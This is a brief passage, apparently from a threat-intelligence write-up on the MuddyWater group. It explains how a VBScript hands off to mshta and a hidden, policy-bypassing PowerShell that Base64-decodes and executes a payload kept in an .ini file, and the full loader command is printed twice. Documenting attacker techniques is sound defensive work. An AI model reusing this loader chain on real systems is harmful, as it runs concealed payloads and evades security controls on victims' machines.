loader gif

I know what you did last summer, MuddyWater blending in the crowd

I know what you did last summer, MuddyWater blending in the crowd (Threat Actors)

The VBS calls powershell.exe to Base64-decode the second file and invoke it, as follows: WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0 WScript.CreateObject("WScript.Shell").Run "mshta vbscript:Close(Execute(""CreateObject(""""WScript.Shell"""").Run""""powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));"""",0 ""))",0 This same technique has been seen implemented in several VBScripts seen in the wild, also suspected of being used by this actor.

loader gif